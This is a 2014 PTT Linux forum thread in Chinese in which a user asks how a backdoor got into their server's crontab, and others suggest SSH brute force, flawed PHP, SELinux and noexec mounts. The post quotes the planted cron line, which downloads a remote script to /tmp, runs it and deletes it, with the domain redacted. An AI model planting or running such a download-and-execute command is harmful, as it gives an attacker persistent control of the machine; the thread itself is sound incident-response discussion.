PTT
Submit
Submit
選擇語言
正體中文
简体中文
PTT
Linux
[問題] 被植入後門
作者:
averywu
(看文不要只會用橫的看)
2014-10-01 11:18:48
我的站台的crontab 被寫入
@weekly wget http://x/bots/regulat.bot -O /tmp/sh;sh /tmp/sh;rm -rf /tmp/sh > /dev/null 2&1
目前已知不影響主機,因為URL已經失效了。
PS.貼出來的URL已經處理過了,domain我改成x,以防被誤點。
但實在找不出他植入的方法,有人知道嗎?
作者:
kenduest
(小州)
0000-00-00 00:00:00
這個還要查看其他點會比較好知道是哪邊引起的常見比方帳號密碼被猜中這種暴力 ssh 登入進來的或者是跑的 php 程式碼有問題這類題外話若你是安裝 rh-based 的版本有開 selinux 的話通常最後會因為 policy 設定不會允許 /tmp 內檔案執行在 web server 環境上面的話比較能夠減少後續問題
作者:
kenduest
(小州)
0000-00-00 00:00:00
這個還要查看其他點會比較好知道是哪邊引起的常見比方帳號密碼被猜中這種暴力 ssh 登入進來的或者是跑的 php 程式碼有問題這類題外話若你是安裝 rh-based 的版本有開 selinux 的話通常最後會因為 policy 設定不會允許 /tmp 內檔案執行在 web server 環境上面的話比較能夠減少後續問題
作者:
dayyeah
(帝耶)
0000-00-00 00:00:00
sh /tmp/sh不就愛幹嘛幹嘛了嗎?他從regulat.bot抓下來
作者: dou0228 (7777)
0000-00-00 00:00:00
/tmp 可以用 -o noexec 防止 sh /tmp/sh
作者:
danny8376
(釣到一隻猴子@_@)
0000-00-00 00:00:00
樓上 那是shell的行為 不是所有shell都會檢查的
作者:
kenduest
(小州)
0000-00-00 00:00:00
noexec 比較適合於 binary 檔案,script 似乎就......
繼續閱讀
[問題] 有辦法用虛擬機開啟雙系統嗎?
qas612820704
[問題] root VG 加入iscsi PV reboot 失敗
Chopin5566
[問題] 如何得知所有LIBRARY的連結
linbanden
[問題] gmail判為spam- 421-4.7.0 rate limited
nov01
[分享] Line Client
carylorrk
Re: [分享] CVE-2014-6271 Bash Shell出現重大漏洞
chiouss
[問題] sar指令查看連線數
nonosun
[分享] Ubuntu Touch 手機將於今年問世
willrise
Re: [分享] CVE-2014-6271 Bash Shell出現重大漏洞
HamalAri
HackingThursday 固定聚會 (2014-10-02)
a0726h77
Links
booklink
Contact Us: admin [ a t ] ucptt.com